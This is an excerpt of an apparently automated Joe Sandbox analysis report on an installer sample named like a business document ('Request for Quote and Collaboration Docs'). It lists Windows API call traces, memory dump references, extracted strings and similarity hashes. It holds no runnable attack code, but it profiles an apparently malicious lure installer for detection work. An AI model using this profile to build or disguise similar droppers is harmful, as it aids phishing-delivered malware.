                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 184305955-0
                                                                                          • Opcode ID: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                          • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                          • Opcode Fuzzy Hash: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                          • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                          APIs
                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                          • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,76F93420,00000000,00434000), ref: 00403935
                                                                                          • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
                                                                                          • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                          • GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                          • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                          • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                          • API String ID: 914957316-1115850852
                                                                                          • Opcode ID: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                          • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                          • Opcode Fuzzy Hash: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                          • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                          APIs
                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                          • GetSysColor.USER32(?), ref: 004043AC
                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                          • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                          • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                          • SetCursor.USER32(00000000), ref: 004044CE
                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                          • SetCursor.USER32(00000000), ref: 004044F2
                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                          • String ID: CB@$N$open
                                                                                          • API String ID: 3615053054-4029390422
                                                                                          • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                          • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                          • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                          • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                          APIs
                                                                                          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                          • wsprintfA.USER32 ref: 00405C80
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                          • API String ID: 1265525490-3322868524
                                                                                          • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                          • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                          • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                          • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                          • String ID: F
                                                                                          • API String ID: 941294808-1304234792
                                                                                          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                          • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
                                                                                          • lstrcatW.KERNEL32(?,00427180), ref: 0040473D
                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                            • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061E1
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061F5
                                                                                            • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 00406208
                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                          • String ID: A
                                                                                          • API String ID: 2246997448-3554254475
                                                                                          • Opcode ID: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                          • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                          • Opcode Fuzzy Hash: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                          • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                          • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                          Strings
                                                                                          • Null, xrefs: 00402EB5
                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                          • soft, xrefs: 00402EAC
                                                                                          • Inst, xrefs: 00402EA3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                          • API String ID: 2803837635-787788815
                                                                                          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                          • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                          • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                          APIs
                                                                                          • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                          • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
                                                                                          • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                          • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
                                                                                          • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                          • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                          • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                          Strings
                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                          • API String ID: 900638850-730719616
                                                                                          • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                          • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                          • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                          • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                          • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                          • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                          • GetSysColor.USER32(?), ref: 004041FA
                                                                                          • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                          • DeleteObject.GDI32(?), ref: 00404224
                                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2320649405-0
                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                          • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                          • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                          APIs
                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                            • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                          • String ID: 9
                                                                                          • API String ID: 1149667376-2366072709
                                                                                          • Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                          • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                          • Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                          • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
